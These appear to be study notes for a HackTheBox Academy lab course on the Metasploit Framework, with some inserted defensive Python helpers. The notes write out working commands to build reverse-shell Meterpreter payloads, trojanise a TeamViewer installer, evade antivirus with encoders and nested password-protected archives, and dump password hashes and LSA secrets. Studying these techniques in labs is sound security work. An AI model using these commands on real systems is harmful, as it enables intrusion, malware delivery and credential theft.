HackTheBox Academy - Using the Metasploit Framework

Updated 10-04-2026

The Metasploit Framework is an open-source set of tools used for network enumeration, attacks, testing security vulnerabilities, evading detection, performing privilege escalation attacks, and performing post-exploitation.

Intro

  • By default, all base files related to Metasploit can be found in /usr/share/metasploit-framework

    # modules are split into separate categories in this folder.
    $ ls /usr/share/metasploit-framework/modules
    auxiliary encoders evasion exploits nops payloads post

    # plugins offer us more flexibility by providing more functionality and automation
    $ ls /usr/share/metasploit-framework/plugins/
    aggregator.rb ips_filter.rb openvas.rb sounds.rb alias.rb komand.rb pcap_log.rb sqlmap.rb auto_add_route.rb lab.rb request.rb thread.rb beholder.rb libnotify.rb rssfeed.rb token_adduser.rb db_credcollect.rb msfd.rb sample.rb token_hunter.rb db_tracker.rb msgrpc.rb session_notifier.rb wiki.rb event_tester.rb nessus.rb session_tagger.rb wmap.rb ffautoregen.rb nexpose.rb socket_logger.rb

    # meterpreter functionality and other useful scripts
    $ ls /usr/share/metasploit-framework/scripts/
    meterpreter ps resource shell

    # cmdline utilities that can be called directly from the msfconsole menu
    $ ls /usr/share/metasploit-framework/tools/
    context docs hardware modules payloads dev exploit memdump password recon

MSF Components

Modules

  • modules are prepared scripts with a specific purpose and corresponding functions that have already been developed and tested in the wild.

  • The Metasploit modules are structured into folders that look like this: <No.> <type>/<os>/<service>/<name>

  • Module type consists of:

    • Auxiliary: Scanning, fuzzing, sniffing, and admin capabilities. Offer extra assistance and functionality.
    • Encoders: Ensure that payloads are intact to their destination.
    • Exploits: Defined as modules that exploit a vulnerability that will allow for the payload delivery.
    • NOPs: (No Operation code) Keep the payload sizes consistent across exploit attempts.
    • Payloads: Code runs remotely and calls back to the attacker machine to establish a connection (or shell).
    • Plugins: Additional scripts can be integrated within an assessment with msfconsole and coexist.
    • Post: Wide array of modules to gather information, pivot deeper, etc.
  • When selecting a module for payload delivery only the following modules can be used as initiators:

    • Auxiliary
    • Exploits
    • Post
    # search function
    help search

    # searching for EternalRomance
    search eternalromance

    search eternalromance type:exploit

    # specific search
    search type:exploit platform:windows cve:2021 rank:excellent microsoft

    # select module
    use 0

    # see everything we're required to set
    options

    # module information
    info

    # target specification
    set RHOSTS 10.10.10.40

    # permanent target specification
    setg RHOSTS 10.10.10.40

    # lhost specification
    setg LHOST 10.10.14.15

    # execute exploit
    run

    # get a shell
    shell

Targets

  • Targets are unique operating system identifiers taken from the versions of those specific operating systems which adapt the selected exploit module to run on that particular version of the operating system.
  • show targets command can be used in an exploit module to view all available vulnerable targets
  • To identify a target correctly, we will need to:
    • Obtain a copy of the target binaries
    • Use msfpescan to locate a suitable return address

Payloads

  • Payload in Metasploit refers to a module that aids the exploit module in (typically) returning a shell to the attacker

  • There are three different types of payload modules:

    • Singles
    • Stagers
    • Stages
  • Whether or not a payload is staged is represented by / in the payload name; for example, windows/shell_bind_tcp is a single payload with no stage, whereas windows/shell/bind_tcp consists of a stager (bind_tcp) and a stage (shell).

  • Single payload contains the exploit and the entire shellcode for the selected task

    • they are more stable than their counterparts because they contain everything all-in-one.
    • some exploits will not support the resulting size of these payloads as they can get quite large
  • Stager payloads work together with Stage payloads to perform a specific task

    • runs on the victim machine and initiates an outbound connection to the attacker’s listener, setting up the communication channel over which the subsequent stage payload is delivered
    • they are typically designed to be small and reliable
  • Stages are payload components that are downloaded by stager modules

    • Stages provide advanced features with no size limits, such as Meterpreter, VNC Injection, and others
  • Payload types:

    • generic/custom: Generic listener, multi-use
    • generic/shell_bind_tcp: Generic listener, multi-use, normal shell, TCP connection binding
    • generic/shell_reverse_tcp: Generic listener, multi-use, normal shell, reverse TCP connection
    • windows/x64/exec: Executes an arbitrary command (Windows x64)
    • windows/x64/loadlibrary: Loads an arbitrary x64 library path
    • windows/x64/messagebox: Spawns a dialog via MessageBox using a customizable title, text & icon
    • windows/x64/shell_reverse_tcp: Normal shell, single payload, reverse TCP connection
    • windows/x64/shell/reverse_tcp: Normal shell, stager + stage, reverse TCP connection
    • windows/x64/shell/bind_ipv6_tcp: Normal shell, stager + stage, IPv6 Bind TCP stager
    • windows/x64/meterpreter/$: Meterpreter payload + varieties above
    • windows/x64/powershell/$: Interactive PowerShell sessions + varieties above
    • windows/x64/vncinject/$: VNC Server (Reflective Injection) + varieties above
    # show payloads
    show payloads

    # filter search
    grep meterpreter show payloads

    grep meterpreter grep reverse_tcp show payloads

    # select payload
    set payload 15

    # see payload options
    show options
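The naming rule above (one trailing segment means a single, stage plus stager means a staged payload) as an added Python example that is not part of the original notes; the architecture segments it recognises are an assumption, and the distinction matters on the defensive side because a staged payload triggers a second transfer (the stage download) right after the first connection.

```python
"""Classify Metasploit payload names as single or staged.

Added example (not from the HTB Academy notes). It encodes the naming rule
above: windows/shell_bind_tcp is a single, windows/shell/bind_tcp is a stage
(shell) plus a stager (bind_tcp). An optional architecture segment (x64, x86)
sits between platform and stage, as in windows/x64/meterpreter/reverse_tcp.
"""
from dataclasses import dataclass
from typing import List, Optional

# Architecture segments that may follow the platform in a payload path (assumed list).
ARCH_SEGMENTS = {"x86", "x64", "aarch64", "armle", "armbe", "mipsle", "mipsbe"}


@dataclass(frozen=True)
class PayloadInfo:
    platform: str          # e.g. "windows" or "generic"
    arch: Optional[str]    # e.g. "x64", or None when the path has no arch part
    stage: str             # "shell", "meterpreter", or the whole name for a single
    stager: Optional[str]  # "reverse_tcp", "bind_tcp", ...; None for singles

    @property
    def staged(self) -> bool:
        return self.stager is not None


def classify_payload(name: str) -> PayloadInfo:
    """Split a payload path and decide whether it is single or staged."""
    parts = [p for p in name.strip().split("/") if p]
    if len(parts) < 2:
        raise ValueError(f"not a payload path: {name!r}")
    platform, rest = parts[0], parts[1:]
    arch = rest.pop(0) if rest[0] in ARCH_SEGMENTS else None
    if len(rest) == 1:            # one segment left: single payload
        return PayloadInfo(platform, arch, rest[0], None)
    if len(rest) == 2:            # stage followed by its stager
        return PayloadInfo(platform, arch, rest[0], rest[1])
    raise ValueError(f"unexpected payload path layout: {name!r}")


def staged_only(names: List[str]) -> List[str]:
    """Return the payload names that need a second-stage download."""
    return [n for n in names if classify_payload(n).staged]
```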

Encoders

  • Encoders help with antivirus evasion
  • can also help remove bad characters from the payload
    # without encoding
    msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl

    # with encoding
    msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl -e x86/shikata_ga_nai

    msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=8080 -e x86/shikata_ga_nai -f exe -i 10 -o /root/Desktop/TeamViewerInstall.exe

    # using on an existing payload within msfconsole
    set payload 15

    show encoders

    # virustotal - check AV evasion
    msf-virustotal -k <API key> -f TeamViewerInstall.exe
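What the -b option above is asking the encoder to guarantee, shown as an added Python check that is not code from the notes or from Metasploit: it extracts the \xNN escapes from a perl/python/c style listing, parses a -b spec the same way, and reports the offsets of any forbidden byte that survived; both listings in the block are constructed stand-ins, not real msfvenom output.

```python
"""Check msfvenom output for bytes that the -b option was meant to exclude.

Added example, not code from the notes or from Metasploit. It pulls every
\\xNN escape out of the perl/python/c style listings msfvenom prints, parses a
-b style spec the same way, and reports where forbidden bytes still occur.
The two listings below are constructed stand-ins, not real msfvenom output.
"""
import re
from typing import Dict, List

ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})")


def parse_escaped_bytes(text: str) -> bytes:
    """Collect the \\xNN escapes from a listing (or a -b spec) into bytes."""
    return bytes(int(hh, 16) for hh in ESCAPE_RE.findall(text))


def find_bad_chars(buf: bytes, badchars: bytes) -> Dict[int, List[int]]:
    """Map each forbidden byte value to the offsets at which it appears."""
    hits: Dict[int, List[int]] = {b: [] for b in badchars}
    for offset, value in enumerate(buf):
        if value in hits:
            hits[value].append(offset)
    return {b: offs for b, offs in hits.items() if offs}


def listing_is_clean(listing: str, badchar_spec: str) -> bool:
    """True when no byte from the -b spec survives in the listing."""
    return not find_bad_chars(parse_escaped_bytes(listing),
                              parse_escaped_bytes(badchar_spec))


# Constructed sample: an unencoded stub that still carries NUL bytes.
RAW_LISTING = r'my $buf = "\xfc\x48\x83\xe4\xf0\x00\xc0" . "\x00\x00\x00\x41\x51";'
# Constructed sample: the same idea after an encoder rewrote it without NULs.
ENCODED_LISTING = r'my $buf = "\xda\xc1\xd9\x74\x24\xf4\x5b" . "\x31\xc9\xb1\x41\x51";'
```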

Databases

  • we can set up databases in msfconsole to keep track of results
  • it has built-in support for PostgreSQL
# postgresql status
sudo service postgresql status

# start postgresql
sudo systemctl start postgresql

# init db - apt update if error occurs
sudo msfdb init

# check msfdb status
sudo msfdb status

# connect to the initiated db
sudo msfdb run

# reinitiate db
msfdb reinit
cp /usr/share/metasploit-framework/config/database.yml ~/.msf4/
sudo service postgresql restart
msfconsole -q
db_status

# database options
help database

Workspaces

  • we can organize our work into Workspaces, which work the same way as folders in a project; we can segregate the different scan results, hosts, and extracted information by IP, subnet, network, or domain
# view current list of workspaces
workspace

# create new workspace
workspace -a Target_1

# select workspace
workspace Target_1

# workspace help menu
workspace -h

# import nmap scan results to workspace - .xml preferred
db_import Target.xml

# using nmap inside msfconsole
db_nmap -sV -sS 10.10.10.8

# export workspace
db_export -h
db_export -f xml backup.xml

# stored hosts
hosts -h

# stored services
services -h

# stored credentials
creds -h

# stored loot
loot -h

Plugins

MSF Sessions

Sessions

  • Sessions create dedicated control interfaces for all of our deployed modules
  • to background a session, we can use [CTRL] + [Z] key combination or by typing the background command in the case of Meterpreter stages
    # list active sessions
    sessions

    # interact with a session
    sessions -i 1

Jobs

  • We would need to use the jobs command to look at the currently active tasks running in the background and terminate the old ones to free up the port.

  • Other types of tasks inside sessions can also be converted into jobs to run in the background seamlessly, even if the session dies or disappears.

    jobs -h

    # run exploit as a background job
    exploit -j

    # list running jobs
    jobs -l

    # kill a running job
    kill 1

    # kill all jobs
    jobs -K

Meterpreter

  • Meterpreter is used to get a direct shell on the target OS, but with more functionality
  • resides entirely in memory and writes nothing to the disk
  • uses a channelized communication system between the target host and the attacker; allows for AES-encrypted traffic
  • can constantly be augmented at runtime and loaded over the network
# scan target
db_nmap -sV -p- -T5 -A 10.10.10.15
hosts
services

# search for exploit
search iis_webdav_upload_asp
use 0

# configure exploit & payload
set RHOST 10.10.10.15
set LHOST tun0
run

# meterpreter migration
getuid
ps
steal_token 1836

# session handling
bg
search local_exploit_suggester
use 0
set SESSION 1
run

# dump hashes
hashdump
lsa_dump_sam

# lsa secrets dump
lsa_dump_secrets

Additional Features

Importing Modules

  • We can search for Metasploit custom exploits from ExploitDB or using searchsploit
  • Custom modules, scripts and plugins can be stored in /usr/share/metasploit-framework and this folder is also symlinked in our home and root folders in ~/.msf4/
cp ~/Downloads/9861.rb /usr/share/metasploit-framework/modules/exploits/unix/webapp/nagios3_command_injection.rb

cp ~/Downloads/9861.rb ~/.msf4/modules/exploits/unix/webapp/nagios3_command_injection.rb

MSFVenom

Evasion Techniques

  • we can hide the payload shellcode deep within the legitimate code of the actual product
  • We do so with the -k flag. However, the target will only notice the running backdoor if they launch the backdoored executable template from a CLI environment
# embed payloads into any executable file
msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -x ~/Downloads/TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 5

Archives

  • Archiving a piece of information such as a file, folder, script, executable, picture, or document and placing a password on the archive bypasses a lot of common anti-virus signatures
# generate payload
msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -e x86/shikata_ga_nai -a x86 --platform windows -o ~/test.js -i 5

# install rar utility
wget https://www.rarlab.com/rar/rarlinux-x64-612.tar.gz
tar -xzvf rarlinux-x64-612.tar.gz && cd rar

# archive test.js
rar a ~/test.rar -p ~/test.js

# remove .rar extension
mv test.rar test

# archive payload again
rar a test2.rar -p test

# remove .rar extension again
mv test2.rar test2

# virustotal shows 0 detection
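The rename trick above (test.rar to test) only beats checks that trust the file name; as an added Python example that is not part of the original notes, the block below identifies archives and executables from their leading bytes and flags names whose extension disagrees with the content. The magic values are the published RAR 4.x, RAR 5.x, ZIP and PE signatures; the extension table and the SAMPLES headers are constructed assumptions, not real files.

```python
"""Spot archives and executables by content, not by file name.

Added example, not from the HTB Academy notes. The rename in the notes
(test.rar -> test) only defeats name-based checks; the leading bytes still
identify the file. Magic values are the published RAR 4.x, RAR 5.x, ZIP and
PE signatures; SAMPLES holds constructed byte strings, not real archives.
"""
import os
from typing import Dict, List, Optional, Tuple
# (magic bytes, label); the longer RAR 5 signature must be tried before RAR 4.
MAGICS: Tuple[Tuple[bytes, str], ...] = (
    (b"Rar!\x1a\x07\x01\x00", "rar5"),  # RAR 5.x archive signature
    (b"Rar!\x1a\x07\x00", "rar4"),      # RAR 1.5 to 4.x archive signature
    (b"PK\x03\x04", "zip"),             # ZIP local file header
    (b"MZ", "pe"),                      # DOS/PE executable header
)
# Extensions under which each container type is expected to appear (assumed list).
EXPECTED_EXT: Dict[str, set] = {
    "rar4": {".rar"}, "rar5": {".rar"},
    "zip": {".zip", ".jar", ".docx", ".xlsx", ".pptx"},  # OOXML docs are ZIPs
    "pe": {".exe", ".dll", ".scr"},
}

def sniff(head: bytes) -> Optional[str]:
    """Return the container type for the first bytes of a file, or None."""
    for magic, label in MAGICS:
        if head.startswith(magic):
            return label
    return None

def name_matches_content(filename: str, head: bytes) -> Tuple[Optional[str], bool]:
    """Return (detected type, extension agrees); unknown content is never flagged."""
    kind = sniff(head)
    if kind is None:
        return None, True
    ext = os.path.splitext(filename)[1].lower()
    return kind, ext in EXPECTED_EXT[kind]

def flag_suspicious(files: Dict[str, bytes]) -> List[str]:
    """Names whose content is an archive or executable hidden behind another name."""
    return sorted(n for n, head in files.items() if not name_matches_content(n, head)[1])

# Constructed sample headers: a RAR 5 archive with its extension removed,
# a .docx that is legitimately a ZIP, a .js that is really a PE, plain text.
SAMPLES: Dict[str, bytes] = {
    "test": b"Rar!\x1a\x07\x01\x00" + b"\x00" * 8,
    "report.docx": b"PK\x03\x04\x14\x00\x06\x00",
    "update.js": b"MZ\x90\x00",
    "notes.txt": b"plain text",
}
```

In a gateway or endpoint scan the same functions would be fed the first 16 bytes of each file; a nested archive like test2 above is caught the same way once the outer layer is opened.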

Packers

  • The term Packer refers to the result of an executable compression process where the payload is packed together with an executable program and with the decompression code in one single file
  • Popular packer software:
  • PolyPack project to learn about packers